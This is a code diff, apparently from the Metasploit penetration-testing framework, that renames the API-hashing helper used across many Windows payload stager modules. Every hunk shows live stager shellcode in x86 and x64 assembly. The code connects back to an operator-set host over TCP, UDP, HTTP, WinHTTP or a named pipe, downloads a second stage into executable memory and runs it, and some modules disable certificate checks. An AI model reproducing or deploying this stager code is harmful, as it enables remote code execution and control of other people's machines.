push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
call ebp
^
end
@@ -352,7 +352,7 @@ module Payload::Windows::ReverseHttp
push edi ; server URI
push ebx ; method
push esi ; hConnection
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}
call ebp
xchg esi, eax ; save hHttpRequest in esi
^
@@ -379,7 +379,7 @@ module Payload::Windows::ReverseHttp
push eax ; &dwFlags
push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
call ebp
^
end
@@ -406,14 +406,14 @@ module Payload::Windows::ReverseHttp
asm << %Q^
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
push #{block_api_hash('wininet.dll', 'HttpSendRequestA')}
call ebp
test eax,eax
jnz allocate_memory
set_wait:
push #{retry_wait} ; dwMilliseconds
push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
push #{block_api_hash('kernel32.dll', 'Sleep')}
call ebp ; Sleep( dwMilliseconds );
^
@@ -442,7 +442,7 @@ module Payload::Windows::ReverseHttp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -459,7 +459,7 @@ module Payload::Windows::ReverseHttp
push 4 ; bytes to read
push eax ; &stage size
push esi ; hRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
push #{block_api_hash('wininet.dll', 'InternetReadFile')}
call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
pop ebx ; bytesRead (unused, pop for cleaning)
pop ebx ; stage size
@@ -470,7 +470,7 @@ module Payload::Windows::ReverseHttp
push 0x1000 ; MEM_COMMIT
push ebx ; Stage allocation
push eax ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
@@ -482,7 +482,7 @@ module Payload::Windows::ReverseHttp
push eax ; read length
push ebx ; buffer
push esi ; hRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
push #{block_api_hash('wininet.dll', 'InternetReadFile')}
call ebp
test eax,eax ; download failed? (optional?)
jz failure
@@ -495,7 +495,7 @@ module Payload::Windows::ReverseHttp
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
@@ -509,7 +509,7 @@ module Payload::Windows::ReverseHttp
push 8192 ; read length
push ebx ; buffer
push esi ; hRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
push #{block_api_hash('wininet.dll', 'InternetReadFile')}
call ebp
test eax,eax ; download failed? (optional?)
@@ -126,7 +126,7 @@ module Payload::Windows::ReverseNamedPipe
db "#{full_pipe_name}", 0x00
get_pipe_name:
; lpFileName (via call)
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
push #{block_api_hash('kernel32.dll', 'CreateFileA')}
call ebp ; CreateFileA(...)
; If eax is -1, then we had a failure.
@@ -147,7 +147,7 @@ module Payload::Windows::ReverseNamedPipe
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -172,7 +172,7 @@ module Payload::Windows::ReverseNamedPipe
push 4 ; nNumberOfBytesToRead = sizeof( DWORD );
push esi ; lpBuffer
push edi ; hFile
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(...) to read the size
^
@@ -195,7 +195,7 @@ module Payload::Windows::ReverseNamedPipe
push 0x1000 ; MEM_COMMIT
push esi ; push the newly received second stage length.
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
@@ -217,7 +217,7 @@ module Payload::Windows::ReverseNamedPipe
push ecx ; nNumberOfBytesToRead
push ebx ; lpBuffer
push edi ; hFile
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(...) to read the data
^
@@ -237,7 +237,7 @@ module Payload::Windows::ReverseNamedPipe
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
push 0 ; dwSize
push eax ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
; restore the stack (one more pop after 2nd ReadFile call)
pop esi
@@ -245,7 +245,7 @@ module Payload::Windows::ReverseNamedPipe
cleanup_file:
; clear up the named pipe handle
push edi ; named pipe handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
push #{block_api_hash('kernel32.dll', 'CloseHandle')}
call ebp ; CloseHandle(...)
; restore the stack back to the connection retry count
+11 -11
View File
@@ -118,7 +118,7 @@ module Payload::Windows::ReverseTcp
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
push 'ws2_' ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
mov eax, ebp
call eax ; LoadLibraryA( "ws2_32" )
@@ -126,7 +126,7 @@ module Payload::Windows::ReverseTcp
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
set_address:
@@ -145,7 +145,7 @@ module Payload::Windows::ReverseTcp
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
^
@@ -168,7 +168,7 @@ module Payload::Windows::ReverseTcp
push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
push #{block_api_hash('ws2_32.dll', 'bind')}
call ebp ; bind( s, &sockaddr_in, 16 );
push #{encoded_host} ; host in little-endian format
push #{encoded_port} ; family AF_INET and port number
@@ -181,7 +181,7 @@ module Payload::Windows::ReverseTcp
push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
push #{block_api_hash('ws2_32.dll', 'connect')}
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
@@ -201,7 +201,7 @@ module Payload::Windows::ReverseTcp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -231,7 +231,7 @@ module Payload::Windows::ReverseTcp
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -251,7 +251,7 @@ module Payload::Windows::ReverseTcp
push 0x1000 ; MEM_COMMIT
push esi ; push the newly received second stage length.
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
@@ -262,7 +262,7 @@ module Payload::Windows::ReverseTcp
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -278,13 +278,13 @@ module Payload::Windows::ReverseTcp
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
push 0 ; dwSize
push eax ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
cleanup_socket:
; clear up the socket
push edi ; socket handle
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
push #{block_api_hash('ws2_32.dll', 'closesocket')}
call ebp ; closesocket(socket)
; restore the stack back to the connection retry count
@@ -79,14 +79,14 @@ module Payload::Windows::ReverseTcpDns
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
push 'ws2_' ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax will be zero, push zero for the flags param.
@@ -97,7 +97,7 @@ module Payload::Windows::ReverseTcpDns
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
@@ -108,7 +108,7 @@ module Payload::Windows::ReverseTcpDns
db "#{opts[:host]}", 0x00
got_hostname:
push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )}
push #{block_api_hash( "ws2_32.dll", "gethostbyname" )}
call ebp ; gethostbyname( "name" );
set_address:
@@ -122,7 +122,7 @@ module Payload::Windows::ReverseTcpDns
push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
push #{block_api_hash('ws2_32.dll', 'connect')}
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
@@ -142,7 +142,7 @@ module Payload::Windows::ReverseTcpDns
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -70,7 +70,7 @@ module Payload::Windows::ReverseTcpRc4
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -93,7 +93,7 @@ module Payload::Windows::ReverseTcpRc4
; push esi ; push the newly received second stage length.
push ecx ; push the alloc length
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
@@ -106,7 +106,7 @@ module Payload::Windows::ReverseTcpRc4
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -122,13 +122,13 @@ module Payload::Windows::ReverseTcpRc4
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
push 0 ; dwSize
push eax ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
cleanup_socket:
; clear up the socket
push edi ; socket handle
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
push #{block_api_hash('ws2_32.dll', 'closesocket')}
call ebp ; closesocket(socket)
; restore the stack back to the connection retry count
+6 -6
View File
@@ -75,14 +75,14 @@ module Payload::Windows::ReverseUdp
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
push 'ws2_' ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
set_address:
@@ -101,7 +101,7 @@ module Payload::Windows::ReverseUdp
inc eax ;
push eax ; push SOCK_DGRAM (UDP socket)
push eax ; push AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
@@ -109,7 +109,7 @@ module Payload::Windows::ReverseUdp
push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
push #{block_api_hash('ws2_32.dll', 'connect')}
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
@@ -129,7 +129,7 @@ module Payload::Windows::ReverseUdp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -160,7 +160,7 @@ module Payload::Windows::ReverseUdp
db #{newline} ; newline
get_nl_address:
push edi ; saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
push #{block_api_hash('ws2_32.dll', 'send')}
call ebp ; call send
^
asm
@@ -205,7 +205,7 @@ module Payload::Windows::ReverseWinHttp
push 0x00707474 ; Push the string 'winhttp',0
push 0x686E6977 ; ...
push esp ; Push a pointer to the "winhttp" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "winhttp" )
^
@@ -215,7 +215,7 @@ module Payload::Windows::ReverseWinHttp
push 0x00323374 ; Push the string 'crypt32',0
push 0x70797263 ; ...
push esp ; Push a pointer to the "crypt32" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "wincrypt" )
^
end
@@ -236,7 +236,7 @@ module Payload::Windows::ReverseWinHttp
; ProxyName (via call)
push 3 ; AccessType (NAMED_PROXY= 3)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
push #{block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
else
@@ -246,7 +246,7 @@ module Payload::Windows::ReverseWinHttp
push ebx ; ProxyName (NULL)
push ebx ; AccessType (DEFAULT_PROXY= 0)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
push #{block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
end
@@ -280,7 +280,7 @@ module Payload::Windows::ReverseWinHttp
asm << %Q^
push eax ; Session handle returned by WinHttpOpen
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
push #{block_api_hash('winhttp.dll', 'WinHttpConnect')}
call ebp
WinHttpOpenRequest:
@@ -292,7 +292,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; ObjectName (URI)
push ebx ; Verb (GET method) (NULL)
push eax ; Connect handle returned by WinHttpConnect
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
push #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
call ebp
xchg esi, eax ; save HttpRequest handler in esi
^
@@ -325,7 +325,7 @@ module Payload::Windows::ReverseWinHttp
push 1 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1)
push 1 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
push #{block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
call ebp
^
elsif opts[:proxy_ie] == true
@@ -337,7 +337,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; store the current URL in case it's needed
mov edi, eax ; put the buffer pointer in edi
push edi ; Push a pointer to the buffer
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
push #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
@@ -374,7 +374,7 @@ module Payload::Windows::ReverseWinHttp
push edx ; lpcwszUrl
lea eax, [esp+64] ; Find the pointer to the hSession - HACK!
push [eax] ; hSession
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
push #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
@@ -403,7 +403,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; lpBuffer (pointer to the proxy)
push 38 ; dwOption (WINHTTP_OPTION_PROXY)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
ie_proxy_setup_finish:
@@ -420,7 +420,7 @@ module Payload::Windows::ReverseWinHttp
push eax ; &buffer
push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
^
end
@@ -456,7 +456,7 @@ module Payload::Windows::ReverseWinHttp
asm << %Q^
push esi ; HttpRequest handle returned by WinHttpOpenRequest [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
push #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
call ebp
test eax,eax
jnz check_response ; if TRUE call WinHttpReceiveResponse API
@@ -476,7 +476,7 @@ module Payload::Windows::ReverseWinHttp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -500,7 +500,7 @@ module Payload::Windows::ReverseWinHttp
push ebx ; &buffer
push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
push #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
@@ -517,7 +517,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; &buffer (20-byte SHA1 hash)
push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID)
push [ebx] ; *pCert
push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
push #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
@@ -555,7 +555,7 @@ module Payload::Windows::ReverseWinHttp
; first to get a valid handle for WinHttpReadData
push ebx ; Reserved (NULL)
push esi ; Request handler returned by WinHttpSendRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
call ebp
test eax,eax
jz failure
@@ -570,7 +570,7 @@ module Payload::Windows::ReverseWinHttp
push 4 ; bytes to read
push eax ; &stage size
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
pop ebx ; bytesRead (unused, pop for cleaning)
pop ebx ; stage size
@@ -583,7 +583,7 @@ module Payload::Windows::ReverseWinHttp
push 0x1000 ; MEM_COMMIT
push ebx ; Stage allocation
push eax ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
@@ -597,7 +597,7 @@ module Payload::Windows::ReverseWinHttp
push eax ; read length
push ebx ; buffer
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp
test eax,eax ; download failed? (optional?)
jz failure
@@ -610,7 +610,7 @@ module Payload::Windows::ReverseWinHttp
; first to get a valid handle for WinHttpReadData
push ebx ; Reserved (NULL)
push esi ; Request handler returned by WinHttpSendRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
call ebp
test eax,eax
jz failure
@@ -620,7 +620,7 @@ module Payload::Windows::ReverseWinHttp
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
@@ -634,7 +634,7 @@ module Payload::Windows::ReverseWinHttp
push 8192 ; NumberOfBytesToRead
push ebx ; Buffer
push esi ; Request handler returned by WinHttpReceiveResponse
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp
test eax,eax ; if download failed? (optional?)
+1 -1
View File
@@ -28,7 +28,7 @@ module Payload::Windows::SendUUID
db #{raw_to_db(uuid_raw)} ; UUID
get_uuid_address:
push edi ; saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
push #{block_api_hash('ws2_32.dll', 'send')}
call ebp ; call send
^
@@ -47,7 +47,7 @@ module Payload::Windows::AddrLoader_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx, rcx ; NULL as we dont care where the allocation is.
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
mov rbx, rax ; rbx = our new memory address for the new stage
@@ -121,7 +121,7 @@ module Payload::Windows::BindNamedPipe_x64
pop r8 ; nNumberOfBytesToWrite
sub rsp, 16 ; allocate + alignment
mov r9, rsp ; lpNumberOfBytesWritten
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
mov r10d, #{block_api_hash('kernel32.dll', 'WriteFile')}
call rbp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
add rsp, 16
^
@@ -159,7 +159,7 @@ module Payload::Windows::BindNamedPipe_x64
push 0 ; nDefaultTimeOut
push #{chunk_size} ; nInBufferSize
push #{chunk_size} ; nOutBufferSize
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
mov r10d, #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
call rbp ; CreateNamedPipeA
mov rdi, rax ; save hPipe (using sockrdi convention)
@@ -175,11 +175,11 @@ module Payload::Windows::BindNamedPipe_x64
connect_pipe:
mov rcx, rdi ; hPipe
xor rdx, rdx ; lpOverlapped
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
mov r10d, #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
call rbp ; ConnectNamedPipe
; check for failure
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
mov r10d, #{block_api_hash('kernel32.dll', 'GetLastError')}
call rbp ; GetLastError
cmp rax, 0x217 ; looking for ERROR_PIPE_CONNECTED
jz get_stage_size ; success
@@ -188,7 +188,7 @@ module Payload::Windows::BindNamedPipe_x64
; wait before trying again
mov rcx, #{retry_wait}
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
call rbp ; Sleep
jmp connect_pipe
^
@@ -206,7 +206,7 @@ module Payload::Windows::BindNamedPipe_x64
mov rdx, rsp ; lpMode (PIPE_WAIT)
xor r8, r8 ; lpMaxCollectionCount
xor r9, r9 ; lpCollectDataTimeout
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
mov r10d, #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
call rbp
^
end
@@ -221,7 +221,7 @@ module Payload::Windows::BindNamedPipe_x64
mov r9, rsp ; lpNumberOfBytesRead
push 0 ; alignment
push 0 ; lpOverlapped
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
call rbp ; ReadFile
add rsp, 0x30 ; adjust stack
pop rsi ; lpNumberOfBytesRead
@@ -246,7 +246,7 @@ module Payload::Windows::BindNamedPipe_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx, rcx ; NULL as we dont care where the allocation is.
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
^
@@ -275,7 +275,7 @@ module Payload::Windows::BindNamedPipe_x64
mov rdx, rbx ; lpBuffer
push 0 ; lpOverlapped
mov rcx, rdi ; hPipe
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
call rbp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
add rsp, 0x28 ; slight stack adjustment
pop rdx ; lpNumberOfBytesRead
@@ -294,14 +294,14 @@ module Payload::Windows::BindNamedPipe_x64
pop r8 ; dwFreeType
push 0 ; 0 to decommit whole block
pop rdx ; dwSize
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')}
call rbp ; VirtualFree(payload, 0, MEM_RELEASE)
cleanup_file:
; clean up the pipe handle
push rdi ; file handle
pop rcx ; hFile
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')}
call rbp ; CloseHandle(hPipe)
jmp failure
@@ -333,7 +333,7 @@ module Payload::Windows::BindNamedPipe_x64
db "kernel32", 0x00
get_kernel32_name:
pop rcx ;
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
